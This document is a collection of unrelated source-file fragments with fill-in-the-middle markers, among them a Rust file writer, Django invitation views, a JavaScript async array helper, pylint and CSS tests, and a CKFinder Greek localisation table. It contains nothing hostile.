<|file_name|>create.rs<|end_file_name|><|fim▁begin|>static LOREM_IPSUM: &'static str =
"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,
quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse
cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non
proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
";
use std::error::Error;
use std::io::prelude::*;
use std::fs::File;
use std::path::Path;
fn main() {
let path = Path::new("out/lorem_ipsum.txt");
let display = path.display();
    // Open the file in write-only mode; returns `io::Result<File>`
let mut file = match File::create(&path) {
Err(why) => panic!("couldn't create {}: {}",
display,
why.description()),
Ok(file) => file,
};
    // Write the `LOREM_IPSUM` string into `file`; returns `io::Result<()>`
match file.write_all(LOREM_IPSUM.as_bytes()) {
Err(why) => {
panic!("couldn't write to {}: {}", display,
why.description())
},<|fim▁hole|><|fim▁end|> | Ok(_) => println!("successfully wrote to {}", display),
}
} |
<|file_name|>view_attributes.py<|end_file_name|><|fim▁begin|>'''
These classes specify the attributes
that a view object can have when editing views
'''
__author__ = 'William Emfinger'
__copyright__ = 'Copyright 2016, ROSMOD'
__credits__ = ['William Emfinger', 'Pranav Srinivas Kumar']
__license__ = 'GPL'
__version__ = '0.4'
__maintainer__ = 'William Emfinger'
__email__ = '[email protected]'
__status__ = 'Production'
from meta import Attribute
objects = ['Container', 'Association']
# model related
class Object(Attribute):
tooltip = 'What kind of object is being viewed.'
options = objects
def __init__(self, value):
super(Object, self).__init__('list', value)
# drawing related
class Layout_Style(Attribute):
tooltip = 'How are the children arranged in this object.'
options = ['horizontal', 'vertical', 'grid', 'anchor']
def __init__(self, value):
super(Layout_Style, self).__init__('list', value)
class Width(Attribute):
tooltip = 'Width of the object.'
def __init__(self, value):
super(Width, self).__init__('float', value)
class Height(Attribute):
tooltip = 'Height of the object.'
def __init__(self, value):
super(Height, self).__init__('float', value)
class Draw_Style(Attribute):
tooltip = 'How the object is drawn.'
options = ['icon', 'ellipse', 'rect', 'round rect', 'hidden']<|fim▁hole|> super(Draw_Style, self).__init__('list', value)
class Icon(Attribute):
tooltip = 'Icon displayed as background of the object.'
def __init__(self, value):
super(Icon, self).__init__('file_png', value)
class Color(Attribute):
tooltip = 'What color will the object be drawn with.'
def __init__(self, value):
super(Color, self).__init__('string', value)
class Text_Location(Attribute):
tooltip = 'Where will text be located?'
options = ['top', 'bottom', 'left', 'right', 'center']
def __init__(self, value):
super(Text_Location, self).__init__('list', value)
class Text_Horizontal_Alignment(Attribute):
tooltip = 'Horizontal Alignment of text'
options = ['left', 'right', 'horizontal center', 'justify']
def __init__(self, value):
super(Text_Horizontal_Alignment, self).__init__('list', value)
class Text_Vertical_Alignment(Attribute):
tooltip = 'Vertical Alignment of text'
options = ['top', 'bottom', 'vertical center']
def __init__(self, value):
super(Text_Vertical_Alignment, self).__init__('list', value)
# Layout configuration related
class Layout_Config(Attribute):
options = ['horizontal', 'vertical', 'grid', 'anchor']
editable = False
def __init__(self, value):
super(Layout_Config, self).__init__('dictionary_list', value)
class Root(Attribute):
tooltip = 'What acts as the local anchor for this object?'
options = ['top left', 'top right',
'bottom left', 'bottom right',
'center left', 'center right',
'top center', 'bottom center']
def __init__(self, value):
super(Root, self).__init__('list', value)
class Anchor(Attribute):
tooltip = 'What other object:point acts as the anchor for this object?'
options = ['top left', 'top right',
'bottom left', 'bottom right',
'center left', 'center right',
'top center', 'bottom center']
editable = False
def __init__(self, value):
super(Anchor, self).__init__('dictionary_reference', value)
# Association
class Source(Attribute):
tooltip = 'What is the external oobject source reference for this object'
def __init__(self, value):
super(Source, self).__init__('string', value)
class Destination(Attribute):
tooltip = 'What is the object destination reference for this object'
def __init__(self, value):
super(Destination, self).__init__('string', value)<|fim▁end|> |
def __init__(self, value): |
<|file_name|>logHist.py<|end_file_name|><|fim▁begin|>import matplotlib.pyplot as plt
import numpy as np
def logHist(X, N=30,fig=None, noclear=False, pdf=False, **kywds):
'''
Plot logarithmic histogram or probability density function from
sampled data.
Args:
X (numpy.ndarray): 1-D array of sampled values
N (Optional[int]): Number of bins (default 30)
fig (Optional[int]): Figure number (default None)
        noclear (Optional[bool]): If True, do not clear the figure (default False)
pdf (Optional[bool]): If True normalize by bin width (default False)
and display as curve instead of bar chart.
Note: results are always normalized by number of samples
**kywds: Arbitrary keyword arguments passed to matplotlib.pyplot.bar <|fim▁hole|> Returns:
x (ndarray): abscissa values of frequencies
n (ndarray): (normalized) frequency values
'''
x = np.logspace(np.log10(np.min(X)),np.log10(np.max(X)),N+1)
n,x = np.histogram(X,bins=x)
n = n/float(X.size)
plt.figure(fig)
if not noclear: plt.clf()
if pdf:
n /= np.diff(x)
x = x[:-1]+np.diff(x)/2
plt.semilogx(x,n,**kywds)
else:
plt.bar(x[:len(x)-1],n,width=np.diff(x),**kywds)
a = plt.gca()
a.set_xlim(10.**np.floor(np.log10(np.min(X))),10.**np.ceil(np.log10(np.max(X))))
a.set_xscale('log')
plt.axis()
return x,n<|fim▁end|> | (or matplotlib.pyplot.semilogx if pdf is True)
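# A hedged usage sketch; the lognormal sample below is an assumption made
# for illustration and is not part of the original module:
if __name__ == '__main__':
    X = np.random.lognormal(mean=0.0, sigma=1.0, size=10000)
    x, n = logHist(X, N=40, pdf=True)
    plt.show()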
|
<|file_name|>views.py<|end_file_name|><|fim▁begin|>from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.template import RequestContext
from django.shortcuts import render_to_response
from django.utils.translation import ugettext
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from models import InvitationError, Invitation, InvitationStats
from forms import InvitationForm, RegistrationFormInvitation
from registration.signals import user_registered
def apply_extra_context(context, extra_context=None):
if extra_context is None:
extra_context = {}
for key, value in extra_context.items():
context[key] = callable(value) and value() or value
return context
@login_required
def invite(request, success_url=None,
form_class=InvitationForm,
template_name='invitation/invitation_form.html',
extra_context=None):
"""
Create an invitation and send invitation email.
Send invitation email and then redirect to success URL if the
invitation form is valid. Redirect named URL ``invitation_unavailable``
on InvitationError. Render invitation form template otherwise.
**Required arguments:**
None.
**Optional arguments:**
:success_url:
The URL to redirect to on successful registration. Default value is
``None``, ``invitation_complete`` will be resolved in this case.
:form_class:
A form class to use for invitation. Takes ``request.user`` as first
argument to its constructor. Must have an ``email`` field. Custom
validation can be implemented here.
:template_name:
A custom template to use. Default value is
``invitation/invitation_form.html``.
:extra_context:
A dictionary of variables to add to the template context. Any
callable object in this dictionary will be called to produce
the end result which appears in the context.
**Template:**
``invitation/invitation_form.html`` or ``template_name`` keyword
argument.
**Context:**
A ``RequestContext`` instance is used rendering the template. Context,
in addition to ``extra_context``, contains:<|fim▁hole|> :form:
The invitation form.
"""
if request.method == 'POST':
form = form_class(request.POST, request.FILES)
if form.is_valid():
try:
invitation = Invitation.objects.invite(
request.user, form.cleaned_data["email"], form.cleaned_data["message"])
except InvitationError, e:
print '****'
print e
print '****'
return HttpResponseRedirect(reverse('invitation_unavailable'))
invitation.send_email(request=request)
if 'next' in request.REQUEST:
return HttpResponseRedirect(request.REQUEST['next'])
return HttpResponseRedirect(success_url or reverse('invitation_complete'))
else:
form = form_class()
context = apply_extra_context(RequestContext(request), extra_context)
return render_to_response(template_name,
{'form': form},
context_instance=context)
def register(request,
invitation_key,
wrong_key_template='invitation/wrong_invitation_key.html',
redirect_to_if_authenticated='/',
success_url=None,
form_class=RegistrationFormInvitation,
template_name='registration/registration_form.html',
extra_context=None):
"""
Allow a new user to register via invitation.
Send invitation email and then redirect to success URL if the
invitation form is valid. Redirect named URL ``invitation_unavailable``
on InvitationError. Render invitation form template otherwise. Sends
registration.signals.user_registered after creating the user.
**Required arguments:**
:invitation_key:
An invitation key in the form of ``[\da-e]{40}``
**Optional arguments:**
:wrong_key_template:
Template to be used when an invalid invitation key is supplied.
Default value is ``invitation/wrong_invitation_key.html``.
:redirect_to_if_authenticated:
URL to be redirected when an authenticated user calls this view.
Defaults value is ``/``
:success_url:
The URL to redirect to on successful registration. Default value is
``None``, ``invitation_registered`` will be resolved in this case.
:form_class:
A form class to use for registration. Takes the invited email as first
argument to its constructor.
:template_name:
A custom template to use. Default value is
``registration/registration_form.html``.
:extra_context:
A dictionary of variables to add to the template context. Any
callable object in this dictionary will be called to produce
the end result which appears in the context.
**Templates:**
``invitation/invitation_form.html`` or ``template_name`` keyword
argument as the *main template*.
``invitation/wrong_invitation_key.html`` or ``wrong_key_template`` keyword
argument as the *wrong key template*.
**Context:**
``RequestContext`` instances are used rendering both templates. Context,
in addition to ``extra_context``, contains:
For wrong key template
:invitation_key: supplied invitation key
For main template
:form:
The registration form.
"""
if request.user.is_authenticated():
return HttpResponseRedirect(redirect_to_if_authenticated)
try:
invitation = Invitation.objects.find(invitation_key)
except Invitation.DoesNotExist:
context = apply_extra_context(RequestContext(request), extra_context)
return render_to_response(wrong_key_template,
{'invitation_key': invitation_key},
context_instance=context)
if request.method == 'POST':
form = form_class(invitation.email, request.POST, request.FILES)
if form.is_valid():
new_user = form.save()
invitation.mark_accepted(new_user)
user_registered.send(sender="invitation",
user=new_user,
request=request)
# return HttpResponseRedirect(success_url or reverse('invitation_registered'))
# return HttpResponseRedirect(success_url or reverse('profiles-profile-detail', kwargs={'slug':new_user.username}))
return HttpResponseRedirect(success_url or reverse('auth_login'))
else:
form = form_class(invitation.email)
context = apply_extra_context(RequestContext(request), extra_context)
return render_to_response(template_name,
{'form': form},
context_instance=context)
@staff_member_required
def reward(request):
"""
Add invitations to users with high invitation performance and redirect
refferring page.
"""
rewarded_users, invitations_given = InvitationStats.objects.reward()
if rewarded_users:
message = ugettext(u'%(users)s users are given a total of ' \
u'%(invitations)s invitations.') % {
'users': rewarded_users,
'invitations': invitations_given}
else:
message = ugettext(u'No user has performance above ' \
u'threshold, no invitations awarded.')
request.user.message_set.create(message=message)
return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))<|fim▁end|> | |
<|file_name|>array.js<|end_file_name|><|fim▁begin|>var nextTick = null;
if (typeof process !== 'undefined' && process) {
if ('nextTick' in process) {
nextTick = process.nextTick;
if (typeof module !== 'undefined') {
if ('exports' in module)
module.exports = Array;
}
}
}
if (!nextTick) {
    // To support general browsers, use setTimeout instead of process.nextTick
nextTick = function(func) {
setTimeout(func, 0);
};
}
var forEachAsync = function(callback, complete) {
var self = this;
function next(index, length) {
var self = this;
if (index >= length) {
if (complete)
complete.apply(this, [ true ]);
return;
}
function _next(stop) {
if (stop === false) {
if (complete)
complete.apply(this, [ false ]);
return;
}
nextTick(function() {
if (ret === false) {
if (complete)
complete.apply(this, [ false ]);
return;
}
next.apply(self, [ index + 1, length ]);
});
}
var ret = callback.apply(self, [ self[index], index, self, _next ]);
if (ret != true)
_next();
}
next.apply(self, [ 0, self.length ]);
};
if (!Array.prototype.forEachAsync)
Object.defineProperty(Array.prototype, 'forEachAsync', { value: forEachAsync });
var parallel = function(workerNumber, callback, complete) {
if (!callback)
return;
var self = this;
var completed = 0;
var total = self.length;
var workerCount = 0;
var currentIndex = 0;
if (total == 0) {
if (complete)
complete();
return;
}
function _complete() {
completed++;
workerCount--;
<|fim▁hole|> } else {
// Next item
nextTick(function() {
currentIndex++;
_parallel(currentIndex);
});
}
}
function _parallel(index) {
if (index >= total)
return;
if (workerCount < workerNumber) {
workerCount++;
if (workerCount < workerNumber) {
// New worker
nextTick(function() {
currentIndex++;
_parallel(currentIndex);
});
}
// Customized callback function
callback(self[index], index, self, _complete);
} else {
nextTick(function() {
_parallel(index);
});
}
}
_parallel(currentIndex);
}
if (!Array.prototype.parallel)
Object.defineProperty(Array.prototype, 'parallel', { value: parallel });<|fim▁end|> | if (workerCount == 0 && completed >= total) {
if (complete)
complete(); |
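// A hedged usage sketch, executed only when this file is run directly;
// the array contents, worker count, and timings are illustrative
// assumptions, not part of the original module:
if (typeof require !== 'undefined' && require.main === module) {
    [ 1, 2, 3, 4 ].parallel(2, function(item, index, arr, done) {
        setTimeout(function() {
            console.log('processed', item);
            done();
        }, 10);
    }, function() {
        console.log('all done');
    });
}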
<|file_name|>unittest_strings.py<|end_file_name|><|fim▁begin|># Copyright (c) 2015-2018, 2020 Claudiu Popa <[email protected]>
# Copyright (c) 2016 Derek Gustafson <[email protected]>
# Copyright (c) 2018 Lucas Cimon <[email protected]>
# Copyright (c) 2018 Yury Gribov <[email protected]>
# Copyright (c) 2019-2021 Pierre Sassoulas <[email protected]>
# Copyright (c) 2019 Ashley Whetter <[email protected]>
# Copyright (c) 2020 hippo91 <[email protected]>
# Copyright (c) 2021 Daniël van Noord <[email protected]>
# Copyright (c) 2021 Marc Mueller <[email protected]>
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/main/LICENSE
from pylint.checkers import strings
TEST_TOKENS = (
'"X"',
"'X'",
"'''X'''",
'"""X"""',
'r"X"',
"R'X'",
'u"X"',
"F'X'",
'f"X"',
"F'X'",
'fr"X"',
'Fr"X"',
'fR"X"',
'FR"X"',
'rf"X"',
'rF"X"',
'Rf"X"',<|fim▁hole|>
def test_str_eval() -> None:
for token in TEST_TOKENS:
assert strings.str_eval(token) == "X"<|fim▁end|> | 'RF"X"',
) |
<|file_name|>testfuncs.py<|end_file_name|><|fim▁begin|>import sys, re
if sys.version_info < (3, 0):
import testcase
import modules.cssfuncs as funcs
else:
from . import testcase
from ..modules import cssfuncs as funcs
class TestFunctions(testcase.TestCase):
title = "CSS Functions"
def test_functions(self):
self.set_text( self.input() )
self.text_equals( self.input() )
self.compile()
self.find( re.escape(self.result()) )
self.decompile()
self.text_equals( self.input() )
def vars(self):<|fim▁hole|>* @transition = transition(all 0.3s ease)
* @transform = transform(rotate(7.deg))
* @gradient1 = linear-gradient(#fff, #f00)
* @gradient2 = linear-gradient(to top, #fff, #f00)
* @gradient3 = linear-gradient(to bottom , #fff, #f00)
*/
"""
def input(self):
return self.vars()+"""
h1 {
@box-shadow;
@transform;
@transition;
@gradient1;
@gradient2;
@gradient3;
}
"""
def result(self):
return self.vars()+"""
h1 {
-webkit-box-shadow: 0 0 4px #ff0;
box-shadow: 0 0 4px #ff0;
-webkit-transform: rotate(7.deg);
-ms-transform: rotate(7.deg);
transform: rotate(7.deg);
-webkit-transition: all 0.3s ease;
transition: all 0.3s ease;
background-image: -webkit-linear-gradient(bottom, #fff, #f00);
background-image: linear-gradient(to top, #fff, #f00);
background-image: -webkit-linear-gradient(bottom, #fff, #f00);
background-image: linear-gradient(to top, #fff, #f00);
background-image: -webkit-linear-gradient(top, #fff, #f00);
background-image: linear-gradient(to bottom , #fff, #f00);
}
"""<|fim▁end|> | return """
/*
* @box-shadow = box-shadow(0 0 4px #ff0) |
<|file_name|>group__spi__interface__gr.js<|end_file_name|><|fim▁begin|>var group__spi__interface__gr =
[
[ "Status Error Codes", "group__spi__execution__status.html", "group__spi__execution__status" ],
[ "SPI Events", "group__SPI__events.html", "group__SPI__events" ],
[ "SPI Control Codes", "group__SPI__control.html", "group__SPI__control" ],
[ "ARM_DRIVER_SPI", "group__spi__interface__gr.html#structARM__DRIVER__SPI", [
[ "GetVersion", "group__spi__interface__gr.html#a8834b281da48583845c044a81566c1b3", null ],
[ "GetCapabilities", "group__spi__interface__gr.html#a065b5fc24d0204692f0f95a44351ac1e", null ],
[ "Initialize", "group__spi__interface__gr.html#afac50d0b28860f7b569293e6b713f8a4", null ],
[ "Uninitialize", "group__spi__interface__gr.html#adcf20681a1402869ecb5c6447fada17b", null ],
[ "PowerControl", "group__spi__interface__gr.html#aba8f1c8019af95ffe19c32403e3240ef", null ],
[ "Send", "group__spi__interface__gr.html#a44eedddf4428cf4b98883b6c27d31922", null ],
[ "Receive", "group__spi__interface__gr.html#adb9224a35fe16c92eb0dd103638e4cf3", null ],
[ "Transfer", "group__spi__interface__gr.html#ad88b63ed74c03ba06b0599ab06ad4cf7", null ],
[ "GetDataCount", "group__spi__interface__gr.html#ad1d892ab3932f65cd7cdf2d0a91ae5da", null ],
[ "Control", "group__spi__interface__gr.html#a6e0f47a92f626a971c5197fca6545505", null ],
[ "GetStatus", "group__spi__interface__gr.html#a7305e7248420cdb4b02ceba87672178d", null ]
] ],
[ "ARM_SPI_CAPABILITIES", "group__spi__interface__gr.html#structARM__SPI__CAPABILITIES", [
[ "simplex", "group__spi__interface__gr.html#af244e2c2facf6414e3886495ee6b40bc", null ],
[ "ti_ssi", "group__spi__interface__gr.html#a8053c540e5d531b692224bdc2463f36a", null ],
[ "microwire", "group__spi__interface__gr.html#a9b4e858eb1d414128994742bf121f94c", null ],
[ "event_mode_fault", "group__spi__interface__gr.html#a309619714f0c4febaa497ebdb9b7e3ca", null ],
[ "reserved", "group__spi__interface__gr.html#aa43c4c21b173ada1b6b7568956f0d650", null ]
] ],
[ "ARM_SPI_STATUS", "group__spi__interface__gr.html#structARM__SPI__STATUS", [
<|fim▁hole|> ] ],
[ "ARM_SPI_SignalEvent_t", "group__spi__interface__gr.html#gafde9205364241ee81290adc0481c6640", null ],
[ "ARM_SPI_GetVersion", "group__spi__interface__gr.html#gad5db9209ef1d64a7915a7278d6a402c8", null ],
[ "ARM_SPI_GetCapabilities", "group__spi__interface__gr.html#gaf4823a11ab5efcd47c79b13801513ddc", null ],
[ "ARM_SPI_Initialize", "group__spi__interface__gr.html#ga1a3c11ed523a4355cd91069527945906", null ],
[ "ARM_SPI_Uninitialize", "group__spi__interface__gr.html#ga0c480ee3eabb82fc746e89741ed2e03e", null ],
[ "ARM_SPI_PowerControl", "group__spi__interface__gr.html#ga1a1e7e80ea32ae381b75213c32aa8067", null ],
[ "ARM_SPI_Send", "group__spi__interface__gr.html#gab2a303d1071e926280d50682f4808479", null ],
[ "ARM_SPI_Receive", "group__spi__interface__gr.html#ga726aff54e782ed9b47f7ba1280a3d8f6", null ],
[ "ARM_SPI_Transfer", "group__spi__interface__gr.html#gaa24026b3822c10272e301f1505136ec2", null ],
[ "ARM_SPI_GetDataCount", "group__spi__interface__gr.html#gaaaecaaf4ec1922f22e7f9de63af5ccdb", null ],
[ "ARM_SPI_Control", "group__spi__interface__gr.html#gad18d229992598d6677bec250015e5d1a", null ],
[ "ARM_SPI_GetStatus", "group__spi__interface__gr.html#ga60d33d8788a76c388cc36e066240b817", null ],
[ "ARM_SPI_SignalEvent", "group__spi__interface__gr.html#ga505b2d787348d51351d38fee98ccba7e", null ]
];<|fim▁end|> | [ "busy", "group__spi__interface__gr.html#a50c88f3c1d787773e2ac1b59533f034a", null ],
[ "data_lost", "group__spi__interface__gr.html#a9675630df67587ecd171c7ef12b9d22a", null ],
[ "mode_fault", "group__spi__interface__gr.html#aeaf54ec655b7a64b9e88578c5f39d4e3", null ],
[ "reserved", "group__spi__interface__gr.html#aa43c4c21b173ada1b6b7568956f0d650", null ]
|
<|file_name|>icon.go<|end_file_name|><|fim▁begin|>// Copyright 2016-2020 The Libsacloud Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");<|fim▁hole|>// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package sacloud
// Icon represents an icon resource
type Icon struct {
*Resource // ID
propAvailability // availability status
propName // name
propScope // scope
propTags // tags
propCreatedAt // creation time
propModifiedAt // modification time
URL string `json:",omitempty"` // icon URL
Image string `json:",omitempty"` // Base64-encoded image data (used when the Size parameter is specified or when uploading an image)
}
// Image is a Base64-encoded image data string
type Image string
// GetURL returns the icon image URL
func (icon *Icon) GetURL() string {
return icon.URL
}
// GetImage returns the icon image data (Base64)
func (icon *Icon) GetImage() string {
return icon.Image
}
// SetImage sets the icon image data (Base64)
func (icon *Icon) SetImage(image string) {
icon.Image = image
}<|fim▁end|> | // you may not use this file except in compliance with the License. |
<|file_name|>platform.py<|end_file_name|><|fim▁begin|># Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class Platform(object):
"""The platform that the target browser is running on.
Provides a limited interface to obtain stats from the platform itself, where<|fim▁hole|> """Platforms may be able to collect GL surface stats."""
class StubSurfaceCollector(object):
def __init__(self, trace_tag):
pass
def __enter__(self):
pass
def __exit__(self, *args):
pass
return StubSurfaceCollector(trace_tag)<|fim▁end|> | possible.
"""
def GetSurfaceCollector(self, trace_tag): |
<|file_name|>el.js<|end_file_name|><|fim▁begin|>/*
* CKFinder
* ========
* http://ckfinder.com
* Copyright (C) 2007-2011, CKSource - Frederico Knabben. All rights reserved.
*
* The software, this file and its contents are subject to the CKFinder
* License. Please read the license.txt file before using, installing, copying,
* modifying or distribute this file or part of its contents. The contents of
* this file is part of the Source Code of CKFinder.
*
*/
/**
* @fileOverview
*/
/**
 * Contains the dictionary of language entries.
* @namespace
*/
CKFinder.lang['el'] =
{
appTitle : 'CKFinder', // MISSING
// Common messages and labels.
common :
{
// Put the voice-only part of the label in the span.
unavailable : '%1<span class="cke_accessibility">, unavailable</span>', // MISSING
confirmCancel : 'Some of the options have been changed. Are you sure to close the dialog?', // MISSING
ok : 'OK', // MISSING
cancel : 'Cancel', // MISSING
confirmationTitle : 'Confirmation', // MISSING
messageTitle : 'Information', // MISSING
inputTitle : 'Question', // MISSING
undo : 'Undo', // MISSING
redo : 'Redo', // MISSING
skip : 'Skip', // MISSING
skipAll : 'Skip all', // MISSING
makeDecision : 'What action should be taken?', // MISSING
rememberDecision: 'Remember my decision' // MISSING
},
<|fim▁hole|>
// Date Format
// d : Day
// dd : Day (padding zero)
// m : Month
// mm : Month (padding zero)
// yy : Year (two digits)
// yyyy : Year (four digits)
// h : Hour (12 hour clock)
// hh : Hour (12 hour clock, padding zero)
// H : Hour (24 hour clock)
// HH : Hour (24 hour clock, padding zero)
// M : Minute
// MM : Minute (padding zero)
// a : Firt char of AM/PM
// aa : AM/PM
DateTime : 'dd/mm/yyyy HH:MM',
DateAmPm : ['ΜΜ', 'ΠΜ'],
// Folders
FoldersTitle : 'Φάκελοι',
FolderLoading : 'Φόρτωση...',
FolderNew : 'Παρακαλούμε πληκτρολογήστε την ονομασία του νέου φακέλου: ',
FolderRename : 'Παρακαλούμε πληκτρολογήστε την νέα ονομασία του φακέλου: ',
FolderDelete : 'Είστε σίγουροι ότι θέλετε να διαγράψετε το φάκελο "%1";',
FolderRenaming : ' (Μετονομασία...)',
FolderDeleting : ' (Διαγραφή...)',
// Files
FileRename : 'Παρακαλούμε πληκτρολογήστε την νέα ονομασία του αρχείου: ',
FileRenameExt : 'Είστε σίγουροι ότι θέλετε να αλλάξετε την επέκταση του αρχείου; Μετά από αυτή την ενέργεια το αρχείο μπορεί να μην μπορεί να χρησιμοποιηθεί',
FileRenaming : 'Μετονομασία...',
FileDelete : 'Είστε σίγουροι ότι θέλετε να διαγράψετε το αρχείο "%1"?',
FilesLoading : 'Loading...', // MISSING
FilesEmpty : 'Empty folder', // MISSING
FilesMoved : 'File %1 moved into %2:%3', // MISSING
FilesCopied : 'File %1 copied into %2:%3', // MISSING
// Basket
BasketFolder : 'Basket', // MISSING
BasketClear : 'Clear Basket', // MISSING
BasketRemove : 'Remove from basket', // MISSING
BasketOpenFolder : 'Open parent folder', // MISSING
BasketTruncateConfirm : 'Do you really want to remove all files from the basket?', // MISSING
BasketRemoveConfirm : 'Do you really want to remove the file "%1" from the basket?', // MISSING
BasketEmpty : 'No files in the basket, drag\'n\'drop some.', // MISSING
BasketCopyFilesHere : 'Copy Files from Basket', // MISSING
BasketMoveFilesHere : 'Move Files from Basket', // MISSING
BasketPasteErrorOther : 'File %s error: %e', // MISSING
BasketPasteMoveSuccess : 'The following files were moved: %s', // MISSING
BasketPasteCopySuccess : 'The following files were copied: %s', // MISSING
// Toolbar Buttons (some used elsewhere)
Upload : 'Μεταφόρτωση',
UploadTip : 'Μεταφόρτωση Νέου Αρχείου',
Refresh : 'Ανανέωση',
Settings : 'Ρυθμίσεις',
Help : 'Βοήθεια',
HelpTip : 'Βοήθεια',
// Context Menus
Select : 'Επιλογή',
SelectThumbnail : 'Επιλογή Μικρογραφίας',
View : 'Προβολή',
Download : 'Λήψη Αρχείου',
NewSubFolder : 'Νέος Υποφάκελος',
Rename : 'Μετονομασία',
Delete : 'Διαγραφή',
CopyDragDrop : 'Copy file here', // MISSING
MoveDragDrop : 'Move file here', // MISSING
// Dialogs
RenameDlgTitle : 'Rename', // MISSING
NewNameDlgTitle : 'New name', // MISSING
FileExistsDlgTitle : 'File already exists', // MISSING
SysErrorDlgTitle : 'System error', // MISSING
FileOverwrite : 'Overwrite', // MISSING
FileAutorename : 'Auto-rename', // MISSING
// Generic
OkBtn : 'OK',
CancelBtn : 'Ακύρωση',
CloseBtn : 'Κλείσιμο',
// Upload Panel
UploadTitle : 'Μεταφόρτωση Νέου Αρχείου',
UploadSelectLbl : 'επιλέξτε το αρχείο που θέλετε να μεταφερθεί κάνοντας κλίκ στο κουμπί',
UploadProgressLbl : '(Η μεταφόρτωση εκτελείται, παρακαλούμε περιμένετε...)',
UploadBtn : 'Μεταφόρτωση Επιλεγμένου Αρχείου',
UploadBtnCancel : 'Cancel', // MISSING
UploadNoFileMsg : 'Παρακαλούμε επιλέξτε ένα αρχείο από τον υπολογιστή σας',
UploadNoFolder : 'Please select folder before uploading.', // MISSING
UploadNoPerms : 'File upload not allowed.', // MISSING
UploadUnknError : 'Error sending the file.', // MISSING
UploadExtIncorrect : 'File extension not allowed in this folder.', // MISSING
// Settings Panel
SetTitle : 'Ρυθμίσεις',
SetView : 'Προβολή:',
SetViewThumb : 'Μικρογραφίες',
SetViewList : 'Λίστα',
SetDisplay : 'Εμφάνιση:',
SetDisplayName : 'Όνομα Αρχείου',
SetDisplayDate : 'Ημερομηνία',
SetDisplaySize : 'Μέγεθος Αρχείου',
SetSort : 'Ταξινόμηση:',
SetSortName : 'βάσει Όνοματος Αρχείου',
SetSortDate : 'βάσει Ημερομήνιας',
SetSortSize : 'βάσει Μεγέθους',
// Status Bar
FilesCountEmpty : '<Κενός Φάκελος>',
FilesCountOne : '1 αρχείο',
FilesCountMany : '%1 αρχεία',
// Size and Speed
Kb : '%1 kB',
KbPerSecond : '%1 kB/s',
// Connector Error Messages.
ErrorUnknown : 'Η ενέργεια δεν ήταν δυνατόν να εκτελεστεί. (Σφάλμα %1)',
Errors :
{
10 : 'Λανθασμένη Εντολή.',
11 : 'Το resource type δεν ήταν δυνατόν να προσδιορίστεί.',
12 : 'Το resource type δεν είναι έγκυρο.',
102 : 'Το όνομα αρχείου ή φακέλου δεν είναι έγκυρο.',
103 : 'Δεν ήταν δυνατή η εκτέλεση της ενέργειας λόγω έλλειψης δικαιωμάτων ασφαλείας.',
104 : 'Δεν ήταν δυνατή η εκτέλεση της ενέργειας λόγω περιορισμών του συστήματος αρχείων.',
105 : 'Λανθασμένη Επέκταση Αρχείου.',
109 : 'Λανθασμένη Ενέργεια.',
110 : 'Άγνωστο Λάθος.',
115 : 'Το αρχείο ή φάκελος υπάρχει ήδη.',
116 : 'Ο φάκελος δεν βρέθηκε. Παρακαλούμε ανανεώστε τη σελίδα και προσπαθήστε ξανά.',
117 : 'Το αρχείο δεν βρέθηκε. Παρακαλούμε ανανεώστε τη σελίδα και προσπαθήστε ξανά.',
118 : 'Source and target paths are equal.', // MISSING
201 : 'Ένα αρχείο με την ίδια ονομασία υπάρχει ήδη. Το μεταφορτωμένο αρχείο μετονομάστηκε σε "%1"',
202 : 'Λανθασμένο Αρχείο',
203 : 'Λανθασμένο Αρχείο. Το μέγεθος του αρχείου είναι πολύ μεγάλο.',
204 : 'Το μεταφορτωμένο αρχείο είναι χαλασμένο.',
205 : 'Δεν υπάρχει προσωρινός φάκελος για να χρησιμοποιηθεί για τις μεταφορτώσεις των αρχείων.',
206 : 'Η μεταφόρτωση ακυρώθηκε για λόγους ασφαλείας. Το αρχείο περιέχει δεδομένα μορφής HTML.',
207 : 'Το μεταφορτωμένο αρχείο μετονομάστηκε σε "%1"',
300 : 'Moving file(s) failed.', // MISSING
301 : 'Copying file(s) failed.', // MISSING
500 : 'Ο πλοηγός αρχείων έχει απενεργοποιηθεί για λόγους ασφαλείας. Παρακαλούμε επικοινωνήστε με τον διαχειριστή της ιστοσελίδας και ελέγξτε το αρχείο ρυθμίσεων του πλοηγού (CKFinder).',
501 : 'Η υποστήριξη των μικρογραφιών έχει απενεργοποιηθεί.'
},
// Other Error Messages.
ErrorMsg :
{
FileEmpty : 'Η ονομασία του αρχείου δεν μπορεί να είναι κενή',
FileExists : 'File %s already exists', // MISSING
FolderEmpty : 'Η ονομασία του φακέλου δεν μπορεί να είναι κενή',
FileInvChar : 'Η ονομασία του αρχείου δεν μπορεί να περιέχει τους ακόλουθους χαρακτήρες: \n\\ / : * ? " < > |',
FolderInvChar : 'Η ονομασία του φακέλου δεν μπορεί να περιέχει τους ακόλουθους χαρακτήρες: \n\\ / : * ? " < > |',
PopupBlockView : 'Δεν ήταν εφικτό να ανοίξει το αρχείο σε νέο παράθυρο. Παρακαλώ, ελέγξτε τις ρυθμίσεις τους πλοηγού σας και απενεργοποιήστε όλους τους popup blockers για αυτή την ιστοσελίδα.'
},
// Imageresize plugin
Imageresize :
{
dialogTitle : 'Resize %s', // MISSING
sizeTooBig : 'Cannot set image height or width to a value bigger than the original size (%size).', // MISSING
resizeSuccess : 'Image resized successfully.', // MISSING
